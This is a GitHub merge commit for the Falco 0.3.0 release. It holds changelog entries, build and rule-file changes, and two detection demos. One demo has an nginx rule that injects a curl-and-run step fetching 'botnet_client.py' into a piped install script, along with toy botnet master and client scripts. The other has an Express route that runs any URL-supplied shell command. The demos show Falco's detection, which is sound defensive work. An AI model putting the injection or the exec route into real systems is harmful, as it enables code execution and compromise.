Merge pull request #109 from draios/dev

Merging for 0.3.0
This commit is contained in:
Mark Stemm 2016-08-05 12:35:31 -07:00 committed by GitHub
commit b6f08cc403
34 changed files with 1763 additions and 156 deletions

View File

@ -36,7 +36,7 @@ script:
- make VERBOSE=1 - make VERBOSE=1
- make package - make package
- cd .. - cd ..
- sudo test/run_regression_tests.sh - sudo test/run_regression_tests.sh $TRAVIS_BRANCH
notifications: notifications:
webhooks: webhooks:
urls: urls:

View File

@ -2,6 +2,68 @@
This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org). This file documents all notable changes to Falco. The release numbering uses [semantic versioning](http://semver.org).
## v0.3.0
Released 2016-08-05
### Major Changes
Significantly improved performance, involving changes in the falco and sysdig repositories:
* Reordering a rule condition's operators to put likely-to-fail operators at the beginning and expensive operators at the end. [[#95](https://github.com/draios/falco/pull/95/)] [[#104](https://github.com/draios/falco/pull/104/)]
* Adding the ability to perform x in (a, b, c, ...) as a single set membership test instead of individual comparisons between x=a, x=b, etc. [[#624](https://github.com/draios/sysdig/pull/624)] [[#98](https://github.com/draios/falco/pull/98/)]
* Avoid unnecessary string manipulations. [[#625](https://github.com/draios/sysdig/pull/625)]
* Using `startswith` as a string comparison operator when possible. [[#623](https://github.com/draios/sysdig/pull/623)]
* Use `is_open_read`/`is_open_write` when possible instead of searching through open flags. [[#610](https://github.com/draios/sysdig/pull/610)]
* Group rules by event type, which allows for an initial filter using event type before going through each rule's condition. [[#627](https://github.com/draios/sysdig/pull/627)] [[#101](https://github.com/draios/falco/pull/101/)]
All of these changes result in dramatically reduced CPU usage. Here are some comparisons between 0.2.0 and 0.3.0 for the following workloads:
* [Phoronix](http://www.phoronix-test-suite.com/)'s `pts/apache` and `pts/dbench` tests.
* Sysdig Cloud Kubernetes Demo: Starts a kubernetes environment using docker with apache and wordpress instances + synthetic workloads.
* [Juttle-engine examples](https://github.com/juttle/juttle-engine/blob/master/examples/README.md) : Several elasticsearch, node.js, logstash, mysql, postgres, influxdb instances run under docker-compose.
| Workload | 0.2.0 CPU Usage | 0.3.0 CPU Usage |
|----------| --------------- | ----------------|
| pts/apache | 24% | 7% |
| pts/dbench | 70% | 5% |
| Kubernetes-Demo (Running) | 6% | 2% |
| Kubernetes-Demo (During Teardown) | 15% | 3% |
| Juttle-examples | 3% | 1% |
As a part of these changes, falco now prefers rule conditions that have at least one `evt.type=` operator, at the beginning of the condition, before any negative operators (i.e. `not` or `!=`). If a condition does not have any `evt.type=` operator, falco will log a warning like:
```
Rule no_evttype: warning (no-evttype):
proc.name=foo
did not contain any evt.type restriction, meaning it will run for all event types.
This has a significant performance penalty. Consider adding an evt.type restriction if possible.
```
If a rule has a `evt.type` operator in the later portion of the condition, falco will log a warning like:
```
Rule evttype_not_equals: warning (trailing-evttype):
evt.type!=execve
does not have all evt.type restrictions at the beginning of the condition,
or uses a negative match (i.e. "not"/"!=") for some evt.type restriction.
This has a performance penalty, as the rule can not be limited to specific event types.
Consider moving all evt.type restrictions to the beginning of the rule and/or
replacing negative matches with positive matches if possible.
```
### Minor Changes
* Several sets of rule cleanups to reduce false positives. [[#95](https://github.com/draios/falco/pull/95/)]
* Add example of how falco can detect abuse of a badly designed REST API. [[#97](https://github.com/draios/falco/pull/97/)]
* Add a new output type "program" that writes a formatted event to a configurable program. Each notification results in one invocation of the program. A common use of this output type would be to send an email for every falco notification. [[#105](https://github.com/draios/falco/pull/105/)] [[#99](https://github.com/draios/falco/issues/99)]
* Add the ability to run falco on all events, including events that are flagged with `EF_DROP_FALCO`. (These events are high-volume, low-value events that are ignored by default to improve performance). [[#107](https://github.com/draios/falco/pull/107/)] [[#102](https://github.com/draios/falco/issues/102)]
### Bug Fixes
* Add third-party jq library now that sysdig requires it. [[#96](https://github.com/draios/falco/pull/96/)]
## v0.2.0 ## v0.2.0
Released 2016-06-09 Released 2016-06-09

View File

@ -58,6 +58,18 @@ ExternalProject_Add(zlib
BUILD_IN_SOURCE 1 BUILD_IN_SOURCE 1
INSTALL_COMMAND "") INSTALL_COMMAND "")
set(JQ_SRC "${PROJECT_BINARY_DIR}/jq-prefix/src/jq")
message(STATUS "Using bundled jq in '${JQ_SRC}'")
set(JQ_INCLUDE "${JQ_SRC}")
set(JQ_LIB "${JQ_SRC}/.libs/libjq.a")
ExternalProject_Add(jq
URL "http://download.draios.com/dependencies/jq-1.5.tar.gz"
URL_MD5 "0933532b086bd8b6a41c1b162b1731f9"
CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
BUILD_IN_SOURCE 1
INSTALL_COMMAND "")
set(JSONCPP_SRC "${SYSDIG_DIR}/userspace/libsinsp/third-party/jsoncpp") set(JSONCPP_SRC "${SYSDIG_DIR}/userspace/libsinsp/third-party/jsoncpp")
set(JSONCPP_INCLUDE "${JSONCPP_SRC}") set(JSONCPP_INCLUDE "${JSONCPP_SRC}")
set(JSONCPP_LIB_SRC "${JSONCPP_SRC}/jsoncpp.cpp") set(JSONCPP_LIB_SRC "${JSONCPP_SRC}/jsoncpp.cpp")
@ -103,6 +115,7 @@ ExternalProject_Add(yamlcpp
set(OPENSSL_BUNDLE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl") set(OPENSSL_BUNDLE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl")
set(OPENSSL_INSTALL_DIR "${OPENSSL_BUNDLE_DIR}/target") set(OPENSSL_INSTALL_DIR "${OPENSSL_BUNDLE_DIR}/target")
set(OPENSSL_INCLUDE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl/include")
set(OPENSSL_LIBRARY_SSL "${OPENSSL_INSTALL_DIR}/lib/libssl.a") set(OPENSSL_LIBRARY_SSL "${OPENSSL_INSTALL_DIR}/lib/libssl.a")
set(OPENSSL_LIBRARY_CRYPTO "${OPENSSL_INSTALL_DIR}/lib/libcrypto.a") set(OPENSSL_LIBRARY_CRYPTO "${OPENSSL_INSTALL_DIR}/lib/libcrypto.a")

View File

@ -2,7 +2,7 @@
####Latest release ####Latest release
**v0.2.0** **v0.3.0**
Read the [change log](https://github.com/draios/falco/blob/dev/CHANGELOG.md) Read the [change log](https://github.com/draios/falco/blob/dev/CHANGELOG.md)
Dev Branch: [![Build Status](https://travis-ci.org/draios/falco.svg?branch=dev)](https://travis-ci.org/draios/falco)<br /> Dev Branch: [![Build Status](https://travis-ci.org/draios/falco.svg?branch=dev)](https://travis-ci.org/draios/falco)<br />
@ -21,12 +21,6 @@ Falco can detect and alert on any behavior that involves making Linux system cal
- A non-device file is written to `/dev` - A non-device file is written to `/dev`
- A standard system binary (like `ls`) makes an outbound network connection - A standard system binary (like `ls`) makes an outbound network connection
This is the initial falco release. Note that much of falco's code comes from
[sysdig](https://github.com/draios/sysdig), so overall stability is very good
for an early release. On the other hand performance is still a work in
progress. On busy hosts and/or with large rule sets, you may see the current
version of falco using high CPU. Expect big improvements in coming releases.
Documentation Documentation
--- ---
[Visit the wiki] (https://github.com/draios/falco/wiki) for full documentation on falco. [Visit the wiki] (https://github.com/draios/falco/wiki) for full documentation on falco.

View File

@ -0,0 +1,78 @@
#Demo of falco with man-in-the-middle attacks on installation scripts
For context, see the corresponding [blog post](http://sysdig.com/blog/making-curl-to-bash-safer) for this demo.
## Demo architecture
### Initial setup
Make sure no prior `botnet_client.py` processes are lying around.
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* apache: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
* nginx: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
* evil_apache: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
* attacker_botnet_master: constantly trying to contact the botnet_client.py process.
* falco: will detect the activities of botnet_client.py.
### Download `install-software.sh`, see botnet client running
Run the following to fetch and execute the installation script,
which also installs the botnet client:
```
$ curl http://localhost/install-software.sh | bash
```
You'll see messages about installing the software. (The script doesn't actually install anything, the messages are just for demonstration purposes).
Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
```
$ ps auxww | grep python
...
root 19983 0.1 0.4 33992 8832 pts/1 S 13:34 0:00 python ./botnet_client.py
$ telnet localhost 1234
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
```
You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
```
attacker_botnet_master | Trying to contact compromised machine...
attacker_botnet_master | Waiting for botnet command and control commands...
attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
```
At this point, kill the botnet_client.py process to clean things up.
### Run installation script again using `fbash`, note falco warnings.
If you run the installation script again:
```
curl http://localhost/install-software.sh | ./fbash
```
In the docker-compose output, you'll see the following falco warnings:
```
falco | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
falco | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
falco | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
falco | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
falco | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
```

View File

@ -0,0 +1,7 @@
#!/bin/sh
while true; do
echo "Trying to contact compromised machine..."
echo "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec" | nc localhost 1234 && echo "**********Contacted compromised machine, sent botnet commands"
sleep 5
done

View File

@ -0,0 +1,51 @@
# Owned by software vendor, serving install-software.sh.
apache:
container_name: apache
image: httpd:2.4
volumes:
- ${PWD}/web_root:/usr/local/apache2/htdocs
# Owned by software vendor, compromised by attacker.
nginx:
container_name: mitm_nginx
image: nginx:latest
links:
- apache
ports:
- "80:80"
volumes:
- ${PWD}/nginx.conf:/etc/nginx/nginx.conf:ro
# Owned by attacker.
evil_apache:
container_name: evil_apache
image: httpd:2.4
volumes:
- ${PWD}/evil_web_root:/usr/local/apache2/htdocs
ports:
- "9090:80"
# Owned by attacker, constantly trying to contact client.
attacker_botnet_master:
container_name: attacker_botnet_master
image: alpine:latest
net: host
volumes:
- ${PWD}/botnet_master.sh:/tmp/botnet_master.sh
command:
- /tmp/botnet_master.sh
# Owned by client, detects attack by attacker
falco:
container_name: falco
image: sysdig/falco:latest
privileged: true
volumes:
- /var/run/docker.sock:/host/var/run/docker.sock
- /dev:/host/dev
- /proc:/host/proc:ro
- /boot:/host/boot:ro
- /lib/modules:/host/lib/modules:ro
- /usr:/host/usr:ro
- ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
tty: true

View File

@ -0,0 +1,18 @@
import socket;
import signal;
import os;
os.close(0);
os.close(1);
os.close(2);
signal.signal(signal.SIGINT,signal.SIG_IGN);
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('0.0.0.0', 1234))
serversocket.listen(5);
while 1:
(clientsocket, address) = serversocket.accept();
clientsocket.send('Waiting for botnet command and control commands...\n');
command = clientsocket.recv(1024)
clientsocket.send('Ok, will execute "{}"\n'.format(command.strip()))
clientsocket.close()

View File

@ -0,0 +1,15 @@
#!/bin/bash
SID=`ps --no-heading -o sess --pid $$`
if [ $SID -ne $$ ]; then
# Not currently a session leader? Run a copy of ourself in a new
# session, with copies of stdin/stdout/stderr.
setsid $0 $@ < /dev/stdin 1> /dev/stdout 2> /dev/stderr &
FBASH=$!
trap "kill $FBASH; exit" SIGINT SIGTERM
wait $FBASH
else
# Just evaluate the commands (from stdin)
source /dev/stdin
fi

View File

@ -0,0 +1,12 @@
http {
server {
location / {
sub_filter_types '*';
sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
sub_filter_once off;
proxy_pass http://apache:80;
}
}
}
events {
}

View File

@ -0,0 +1,156 @@
#!/bin/bash
#
# Copyright (C) 2013-2014 My Company inc.
#
# This file is part of my-software
#
# my-software is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# my-software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with my-software. If not, see <http://www.gnu.org/licenses/>.
#
set -e
function install_rpm {
if ! hash curl > /dev/null 2>&1; then
echo "* Installing curl"
yum -q -y install curl
fi
echo "*** Installing my-software public key"
# A rpm --import command would normally be here
echo "*** Installing my-software repository"
# A curl path-to.repo <some url> would normally be here
echo "*** Installing my-software"
# A yum -q -y install my-software command would normally be here
echo "*** my-software Installed!"
}
function install_deb {
export DEBIAN_FRONTEND=noninteractive
if ! hash curl > /dev/null 2>&1; then
echo "* Installing curl"
apt-get -qq -y install curl < /dev/null
fi
echo "*** Installing my-software public key"
# A curl <url> | apt-key add - command would normally be here
echo "*** Installing my-software repository"
# A curl path-to.list <some url> would normally be here
echo "*** Installing my-software"
# An apt-get -qq -y install my-software command would normally be here
echo "*** my-software Installed!"
}
function unsupported {
echo 'Unsupported operating system. Please consider writing to the mailing list at'
echo 'https://groups.google.com/forum/#!forum/my-software or trying the manual'
echo 'installation.'
exit 1
}
if [ $(id -u) != 0 ]; then
echo "Installer must be run as root (or with sudo)."
# exit 1
fi
echo "* Detecting operating system"
ARCH=$(uname -m)
if [[ ! $ARCH = *86 ]] && [ ! $ARCH = "x86_64" ]; then
unsupported
fi
if [ -f /etc/debian_version ]; then
if [ -f /etc/lsb-release ]; then
. /etc/lsb-release
DISTRO=$DISTRIB_ID
VERSION=${DISTRIB_RELEASE%%.*}
else
DISTRO="Debian"
VERSION=$(cat /etc/debian_version | cut -d'.' -f1)
fi
case "$DISTRO" in
"Ubuntu")
if [ $VERSION -ge 10 ]; then
install_deb
else
unsupported
fi
;;
"LinuxMint")
if [ $VERSION -ge 9 ]; then
install_deb
else
unsupported
fi
;;
"Debian")
if [ $VERSION -ge 6 ]; then
install_deb
elif [[ $VERSION == *sid* ]]; then
install_deb
else
unsupported
fi
;;
*)
unsupported
;;
esac
elif [ -f /etc/system-release-cpe ]; then
DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f3)
VERSION=$(cat /etc/system-release-cpe | cut -d':' -f5 | cut -d'.' -f1 | sed 's/[^0-9]*//g')
case "$DISTRO" in
"oracle" | "centos" | "redhat")
if [ $VERSION -ge 6 ]; then
install_rpm
else
unsupported
fi
;;
"amazon")
install_rpm
;;
"fedoraproject")
if [ $VERSION -ge 13 ]; then
install_rpm
else
unsupported
fi
;;
*)
unsupported
;;
esac
else
unsupported
fi

View File

@ -0,0 +1,66 @@
#Demo of falco with bash exec via poorly designed REST API.
## Introduction
This example shows how a server could have a poorly designed API that
allowed a client to execute arbitrary programs on the server, and how
that behavior can be detected using Sysdig Falco.
`server.js` in this directory defines the server. The poorly designed
API is this route handler:
```javascript
router.get('/exec/:cmd', function(req, res) {
var output = child_process.execSync(req.params.cmd);
res.send(output);
});
app.use('/api', router);
```
It blindly takes the url portion after `/api/exec/<cmd>` and tries to
execute it. A horrible design choice(!), but allows us to easily show
Sysdig falco's capabilities.
## Demo architecture
### Start everything using docker-compose
From this directory, run the following:
```
$ docker-compose -f demo.yml up
```
This starts the following containers:
* express_server: simple express server exposing a REST API under the endpoint `/api/exec/<cmd>`.
* falco: will detect when you execute a shell via the express server.
### Access urls under `/api/exec/<cmd>` to run arbitrary commands.
Run the following commands to execute arbitrary commands like 'ls', 'pwd', etc:
```
$ curl http://localhost:8080/api/exec/ls
demo.yml
node_modules
package.json
README.md
server.js
```
```
$ curl http://localhost:8080/api/exec/pwd
.../examples/nodejs-bad-rest-api
```
### Try to run bash via `/api/exec/bash`, falco sends alert.
If you try to run bash via `/api/exec/bash`, falco will generate an alert:
```
falco | 22:26:53.536628076: Warning Shell spawned in a container other than entrypoint (user=root container_id=6f339b8aeb0a container_name=express_server shell=bash parent=sh cmdline=bash )
```

View File

@ -0,0 +1,24 @@
# Owned by software vendor, serving install-software.sh.
express_server:
container_name: express_server
image: node:latest
working_dir: /usr/src/app
command: bash -c "npm install && node server.js"
ports:
- "8080:8080"
volumes:
- ${PWD}:/usr/src/app
falco:
container_name: falco
image: sysdig/falco:latest
privileged: true
volumes:
- /var/run/docker.sock:/host/var/run/docker.sock
- /dev:/host/dev
- /proc:/host/proc:ro
- /boot:/host/boot:ro
- /lib/modules:/host/lib/modules:ro
- /usr:/host/usr:ro
- ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
tty: true

View File

@ -0,0 +1,7 @@
{
"name": "bad-rest-api",
"main": "server.js",
"dependencies": {
"express": "~4.0.0"
}
}

View File

@ -0,0 +1,25 @@
var express = require('express'); // call express
var app = express(); // define our app using express
var child_process = require('child_process');
var port = process.env.PORT || 8080; // set our port
// ROUTES FOR OUR API
// =============================================================================
var router = express.Router(); // get an instance of the express Router
// test route to make sure everything is working (accessed at GET http://localhost:8080/api)
router.get('/', function(req, res) {
res.json({ message: 'API available'});
});
router.get('/exec/:cmd', function(req, res) {
var output = child_process.execSync(req.params.cmd);
res.send(output);
});
app.use('/api', router);
app.listen(port);
console.log('Server running on port: ' + port);

View File

@ -23,3 +23,6 @@ file_output:
stdout_output: stdout_output:
enabled: true enabled: true
program_output:
enabled: false
program: mail -s "Falco Notification" someone@example.com

View File

@ -14,26 +14,17 @@
# condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory)) # condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
- macro: open_write - macro: open_write
condition: > condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f'
(evt.type=open or evt.type=openat) and
fd.typechar='f' and
(evt.arg.flags contains O_WRONLY or
evt.arg.flags contains O_RDWR or
evt.arg.flags contains O_CREAT or
evt.arg.flags contains O_TRUNC)
- macro: open_read - macro: open_read
condition: > condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f'
(evt.type=open or evt.type=openat) and
fd.typechar='f' and
(evt.arg.flags contains O_RDONLY or
evt.arg.flags contains O_RDWR)
- macro: rename - macro: rename
condition: syscall.type = rename condition: evt.type = rename
- macro: mkdir - macro: mkdir
condition: syscall.type = mkdir condition: evt.type = mkdir
- macro: remove - macro: remove
condition: syscall.type in (remove, rmdir, unlink, unlink_at) condition: evt.type in (rmdir, unlink, unlinkat)
- macro: modify - macro: modify
condition: rename or remove condition: rename or remove
@ -43,105 +34,106 @@
# File categories # File categories
- macro: terminal_file_fd - macro: terminal_file_fd
condition: fd.name=/dev/ptmx or fd.directory=/dev/pts condition: fd.name=/dev/ptmx or fd.name startswith /dev/pts
# This really should be testing that the directory begins with these
# prefixes but sysdig's filter doesn't have a "starts with" operator
# (yet).
- macro: bin_dir - macro: bin_dir
condition: fd.directory in (/bin, /sbin, /usr/bin, /usr/sbin) condition: fd.directory in (/bin, /sbin, /usr/bin, /usr/sbin)
- macro: bin_dir_mkdir - macro: bin_dir_mkdir
condition: evt.arg[0] contains /bin/ or evt.arg[0] contains /sbin/ or evt.arg[0] contains /usr/bin/ or evt.arg[0] contains /usr/sbin/ condition: evt.arg[0] startswith /bin/ or evt.arg[0] startswith /sbin/ or evt.arg[0] startswith /usr/bin/ or evt.arg[0] startswith /usr/sbin/
- macro: bin_dir_rename - macro: bin_dir_rename
condition: evt.arg[1] contains /bin/ or evt.arg[1] contains /sbin/ or evt.arg[1] contains /usr/bin/ or evt.arg[1] contains /usr/sbin/ condition: evt.arg[1] startswith /bin/ or evt.arg[1] startswith /sbin/ or evt.arg[1] startswith /usr/bin/ or evt.arg[1] startswith /usr/sbin/
# This really should be testing that the directory begins with /etc,
# but sysdig's filter doesn't have a "starts with" operator (yet).
- macro: etc_dir - macro: etc_dir
condition: fd.directory contains /etc condition: fd.name startswith /etc
- macro: ubuntu_so_dirs - macro: ubuntu_so_dirs
condition: fd.directory contains /lib/x86_64-linux-gnu or fd.directory contains /usr/lib/x86_64-linux-gnu or fd.directory contains /usr/lib/sudo condition: fd.name startswith /lib/x86_64-linux-gnu or fd.name startswith /usr/lib/x86_64-linux-gnu or fd.name startswith /usr/lib/sudo
- macro: centos_so_dirs - macro: centos_so_dirs
condition: fd.directory contains /lib64 or fd.directory contains /user/lib64 or fd.directory contains /usr/libexec condition: fd.name startswith /lib64 or fd.name startswith /usr/lib64 or fd.name startswith /usr/libexec
- macro: linux_so_dirs - macro: linux_so_dirs
condition: ubuntu_so_dirs or centos_so_dirs or fd.name=/etc/ld.so.cache condition: ubuntu_so_dirs or centos_so_dirs or fd.name=/etc/ld.so.cache
- macro: coreutils_binaries - list: coreutils_binaries
condition: > items: [
proc.name in (truncate, sha1sum, numfmt, fmt, fold, uniq, cut, who, truncate, sha1sum, numfmt, fmt, fold, uniq, cut, who,
groups, csplit, sort, expand, printf, printenv, unlink, tee, chcon, stat, groups, csplit, sort, expand, printf, printenv, unlink, tee, chcon, stat,
basename, split, nice, yes, whoami, sha224sum, hostid, users, stdbuf, basename, split, nice, "yes", whoami, sha224sum, hostid, users, stdbuf,
base64, unexpand, cksum, od, paste, nproc, pathchk, sha256sum, wc, test, base64, unexpand, cksum, od, paste, nproc, pathchk, sha256sum, wc, test,
comm, arch, du, factor, sha512sum, md5sum, tr, runcon, env, dirname, comm, arch, du, factor, sha512sum, md5sum, tr, runcon, env, dirname,
tsort, join, shuf, install, logname, pinky, nohup, expr, pr, tty, timeout, tsort, join, shuf, install, logname, pinky, nohup, expr, pr, tty, timeout,
tail, [, seq, sha384sum, nl, head, id, mkfifo, sum, dircolors, ptx, shred, tail, "[", seq, sha384sum, nl, head, id, mkfifo, sum, dircolors, ptx, shred,
tac, link, chroot, vdir, chown, touch, ls, dd, uname, true, pwd, date, tac, link, chroot, vdir, chown, touch, ls, dd, uname, "true", pwd, date,
chgrp, chmod, mktemp, cat, mknod, sync, ln, false, rm, mv, cp, echo, chgrp, chmod, mktemp, cat, mknod, sync, ln, "false", rm, mv, cp, echo,
readlink, sleep, stty, mkdir, df, dir, rmdir, touch) readlink, sleep, stty, mkdir, df, dir, rmdir, touch
]
# dpkg -L login | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" "," # dpkg -L login | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" ","
- macro: login_binaries - list: login_binaries
condition: proc.name in (login, systemd-logind, su, nologin, faillog, lastlog, newgrp, sg) items: [login, systemd-logind, su, nologin, faillog, lastlog, newgrp, sg]
# dpkg -L passwd | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" "," # dpkg -L passwd | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" ","
- macro: passwd_binaries - list: passwd_binaries
condition: > items: [
proc.name in (shadowconfig, grpck, pwunconv, grpconv, pwck, shadowconfig, grpck, pwunconv, grpconv, pwck,
groupmod, vipw, pwconv, useradd, newusers, cppw, chpasswd, usermod, groupmod, vipw, pwconv, useradd, newusers, cppw, chpasswd, usermod,
groupadd, groupdel, grpunconv, chgpasswd, userdel, chage, chsh, groupadd, groupdel, grpunconv, chgpasswd, userdel, chage, chsh,
gpasswd, chfn, expiry, passwd, vigr, cpgr) gpasswd, chfn, expiry, passwd, vigr, cpgr
]
# repoquery -l shadow-utils | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" "," # repoquery -l shadow-utils | grep bin | xargs ls -ld | grep -v '^d' | awk '{print $9}' | xargs -L 1 basename | tr "\\n" ","
- macro: shadowutils_binaries - list: shadowutils_binaries
condition: > items: [
proc.name in (chage, gpasswd, lastlog, newgrp, sg, adduser, deluser, chpasswd, chage, gpasswd, lastlog, newgrp, sg, adduser, deluser, chpasswd,
groupadd, groupdel, addgroup, delgroup, groupmems, groupmod, grpck, grpconv, grpunconv, groupadd, groupdel, addgroup, delgroup, groupmems, groupmod, grpck, grpconv, grpunconv,
newusers, pwck, pwconv, pwunconv, useradd, userdel, usermod, vigr, vipw, unix_chkpwd) newusers, pwck, pwconv, pwunconv, useradd, userdel, usermod, vigr, vipw, unix_chkpwd
]
- macro: sysdigcloud_binaries - list: sysdigcloud_binaries
condition: proc.name in (setup-backend, dragent) items: [setup-backend, dragent]
- macro: sysdigcloud_binaries_parent - list: docker_binaries
condition: proc.pname in (setup-backend, dragent) items: [docker, exe]
- macro: docker_binaries - list: http_server_binaries
condition: proc.name in (docker, exe) items: [nginx, httpd, httpd-foregroun, lighttpd]
- macro: http_server_binaries - list: db_server_binaries
condition: proc.name in (nginx, httpd, httpd-foregroun, lighttpd) items: [mysqld]
- macro: db_server_binaries - macro: server_procs
condition: proc.name in (mysqld) condition: proc.name in (http_server_binaries, db_server_binaries, docker_binaries, sshd)
- macro: db_server_binaries_parent
condition: proc.pname in (mysqld)
- macro: server_binaries
condition: (http_server_binaries or db_server_binaries or docker_binaries or proc.name in (sshd))
# The truncated dpkg-preconfigu is intentional, process names are # The truncated dpkg-preconfigu is intentional, process names are
# truncated at the sysdig level. # truncated at the sysdig level.
- macro: package_mgmt_binaries - list: package_mgmt_binaries
condition: proc.name in (dpkg, dpkg-preconfigu, rpm, rpmkey, yum) items: [dpkg, dpkg-preconfigu, rpm, rpmkey, yum, frontend]
- macro: package_mgmt_procs
condition: proc.name in (package_mgmt_binaries)
- list: ssl_mgmt_binaries
items: [ca-certificates]
- list: dhcp_binaries
items: [dhclient, dhclient-script]
# A canonical set of processes that run other programs with different # A canonical set of processes that run other programs with different
# privileges or as a different user. # privileges or as a different user.
- macro: userexec_binaries - list: userexec_binaries
condition: proc.name in (sudo, su) items: [sudo, su]
- macro: user_mgmt_binaries - list: user_mgmt_binaries
condition: (login_binaries or passwd_binaries or shadowutils_binaries) items: [login_binaries, passwd_binaries, shadowutils_binaries]
- macro: system_binaries - macro: system_procs
condition: (coreutils_binaries or user_mgmt_binaries) condition: proc.name in (coreutils_binaries, user_mgmt_binaries)
- macro: mail_binaries - list: mail_binaries
condition: proc.name in (sendmail, sendmail-msp, postfix, procmail) items: [sendmail, sendmail-msp, postfix, procmail, exim4]
- macro: sensitive_files - macro: sensitive_files
condition: (fd.name contains /etc/shadow or fd.name = /etc/sudoers or fd.directory in (/etc/sudoers.d, /etc/pam.d) or fd.name = /etc/pam.conf) condition: fd.name startswith /etc and (fd.name in (/etc/shadow, /etc/sudoers, /etc/pam.conf) or fd.directory in (/etc/sudoers.d, /etc/pam.d))
# Indicates that the process is new. Currently detected using time # Indicates that the process is new. Currently detected using time
# since process was started, using a threshold of 5 seconds. # since process was started, using a threshold of 5 seconds.
@ -150,11 +142,11 @@
# Network # Network
- macro: inbound - macro: inbound
condition: ((syscall.type=listen and evt.dir=>) or (syscall.type=accept and evt.dir=<)) condition: ((evt.type=listen and evt.dir=>) or (evt.type=accept and evt.dir=<))
# Currently sendto is an ignored syscall, otherwise this could also check for (syscall.type=sendto and evt.dir=>) # Currently sendto is an ignored syscall, otherwise this could also check for (evt.type=sendto and evt.dir=>)
- macro: outbound - macro: outbound
condition: syscall.type=connect and evt.dir=< and (fd.typechar=4 or fd.typechar=6) condition: evt.type=connect and evt.dir=< and (fd.typechar=4 or fd.typechar=6)
- macro: ssh_port - macro: ssh_port
condition: fd.lport=22 condition: fd.lport=22
@ -165,17 +157,15 @@
# System # System
- macro: modules - macro: modules
condition: syscall.type in (delete_module, init_module) condition: evt.type in (delete_module, init_module)
- macro: container - macro: container
condition: container.id != host condition: container.id != host
- macro: interactive - macro: interactive
condition: ((proc.aname=sshd and proc.name != sshd) or proc.name=systemd-logind) condition: ((proc.aname=sshd and proc.name != sshd) or proc.name=systemd-logind)
- macro: syslog - macro: syslog
condition: fd.name in (/dev/log, /run/systemd/journal/syslog) condition: fd.name in (/dev/log, /run/systemd/journal/syslog)
- macro: cron - list: cron_binaries
condition: proc.name in (cron, crond) items: [cron, crond]
- macro: parent_cron
condition: proc.pname in (cron, crond)
# System users that should never log into a system. Consider adding your own # System users that should never log into a system. Consider adding your own
# service users (e.g. 'apache' or 'mysqld') here. # service users (e.g. 'apache' or 'mysqld') here.
@ -189,57 +179,64 @@
- rule: write_binary_dir - rule: write_binary_dir
desc: an attempt to write to any file below a set of binary directories desc: an attempt to write to any file below a set of binary directories
condition: evt.dir = < and open_write and not package_mgmt_binaries and bin_dir condition: bin_dir and evt.dir = < and open_write and not package_mgmt_procs
output: "File below a known binary directory opened for writing (user=%user.name command=%proc.cmdline file=%fd.name)" output: "File below a known binary directory opened for writing (user=%user.name command=%proc.cmdline file=%fd.name)"
priority: WARNING priority: WARNING
- macro: write_etc_common
condition: >
etc_dir and evt.dir = < and open_write
and not proc.name in (shadowutils_binaries, sysdigcloud_binaries, package_mgmt_binaries, ssl_mgmt_binaries, dhcp_binaries, ldconfig.real)
and not proc.pname in (sysdigcloud_binaries)
and not fd.directory in (/etc/cassandra, /etc/ssl/certs/java)
- rule: write_etc - rule: write_etc
desc: an attempt to write to any file below /etc, not in a pipe installer session desc: an attempt to write to any file below /etc, not in a pipe installer session
